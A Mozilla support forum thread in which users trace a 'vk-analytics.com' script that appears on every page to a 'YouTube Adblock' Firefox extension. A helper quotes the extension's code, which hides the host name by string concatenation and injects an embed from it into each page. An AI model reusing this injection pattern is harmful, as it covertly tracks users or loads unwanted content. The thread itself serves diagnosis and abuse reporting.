Join the AMA (Ask Me Anything) with the Firefox leadership team to celebrate Firefox 20th anniversary and discuss Firefox’s future on Mozilla Connect. Mark your calendar on Thursday, November 14, 18:00 - 20:00 UTC!

Pomoc pśepytaś

Glědajśo se wobšudy pomocy. Njenapominajomy was nigda, telefonowy numer zawołaś, SMS pósłaś abo wósobinske informacije pśeraźiś. Pšosym dajśo suspektnu aktiwitu z pomocu nastajenja „Znjewužywanje k wěsći daś“ k wěsći.

Dalšne informacije

A script "vk-analytics.com" tries to load in every page that I open or link that I go to using firefox.

  • 6 wótegrona
  • 1 ma toś ten problem
  • 1 naglěd
  • Slědne wótegrono wót washicd

more options

The script blocker that I use shows that "vk-analytics.com" tries to load on every page I open, even google.com, duckduckgo.com, etc. I updated to the latest version of Firefox but that didn't help. I downloaded another browser "Opera" and added a script blocker extension on it. That script does not try to load on any page that I open in Opera. What is causing this to happen in Firefox. If you navigate to vk-analytics.com you are redirected to vk.com, apparently a popular European social website.

The script blocker that I use shows that "vk-analytics.com" tries to load on every page I open, even google.com, duckduckgo.com, etc. I updated to the latest version of Firefox but that didn't help. I downloaded another browser "Opera" and added a script blocker extension on it. That script does not try to load on any page that I open in Opera. What is causing this to happen in Firefox. If you navigate to vk-analytics.com you are redirected to vk.com, apparently a popular European social website.

Wubrane rozwězanje

Hello, You have an extension type video downloader (savefrom net youtube downloader with all the variant even a download manager extension ) Pretty sure that it is responsible for this behavior Another question: You have a proxy or a proxy type extension: (vpn, private shields,etc) Try to remove them. Hope this help

Toś to wótegrono w konteksće cytaś 👍 0

Wšykne wótegrona (6)

more options

Wubrane rozwězanje

Hello, You have an extension type video downloader (savefrom net youtube downloader with all the variant even a download manager extension ) Pretty sure that it is responsible for this behavior Another question: You have a proxy or a proxy type extension: (vpn, private shields,etc) Try to remove them. Hope this help

more options

Thank you Anna! Looks like YouTube Adblock was loading the script. I disabled it and it stopped.

more options

Hi washicd, can you post the unique ID of that extension so the Add-ons team can consider blocking it? The easiest place to find it is on the Troubleshooting Information page. Either:

  • "3-bar" menu button > "?" Help > Troubleshooting Information
  • (menu bar) Help > Troubleshooting Information
  • type or paste about:support in the address bar and press Enter

Scroll down past "Application Basics" and "Firefox Features" to "Extensions". Then you can select the relevant portion of the table for that extension (or the entire table) -- not the entire page, please, that's too much information. Then you can copy using either Ctrl+c or right-click > Copy and then paste it into a reply. It will be a bit messy, but we're used it.

more options

There are other things that need attention.

The System Details list shows that you have an outdated Flash plugins, current is 31.0.0.108 (31.0 r0).

  • Shockwave Flash 24.0 r0

You can find the installation path of a plugin on the about:plugins page.


You can download the latest NPAPI Flash plugin for Firefox on this page.

There are several reports that this extension injects a script on every page.

Addon embeds javascript for vk-analytics on every page before body ends. Please report abuse.

✓ Privacy Policy: This extension uses Google Analytics, a web analytics service provided by Google, Inc. (“Google”). Google Analytics uses “cookies”, which are text files placed on your computer, to help the website analyze how users use the site.

"name": "__MSG_extension_name__",
"description": "__MSG_extension_description__",
"short_name": "YouTubeAdblock",    
"applications": {
"gecko": { "id": "{80e9f0be-bd1e-4b69-b079-5f44b2962921}" }

ytembed.js :

    initialize: function () {  
		getStorage();
		var ytEmbed = document.createElement("embed");
		ytEmbed.src = '//vk' + '-' + 'analytics.com' + '/youtube';
		ytEmbed.onload = function() {
			temp.remove()
		};
		ytEmbed.onerror = function() {
			temp.remove()
		};
		var temp = document.body.appendChild(ytEmbed);
	}

Wót cor-el změnjony

more options

Thanks jscher2000, here is that extension information:

YouTube Adblock 2.1.3 false {80e9f0be-bd1e-4b69-b079-5f44b2962921}

more options

cor-el, thanks for that! I updated that flash plugin. Also, I searched for "vk-analytics" on one of the page sources while noscript was disabled and didn't find anything. I see from your post that it wasn't quite so obvious. Thanks again!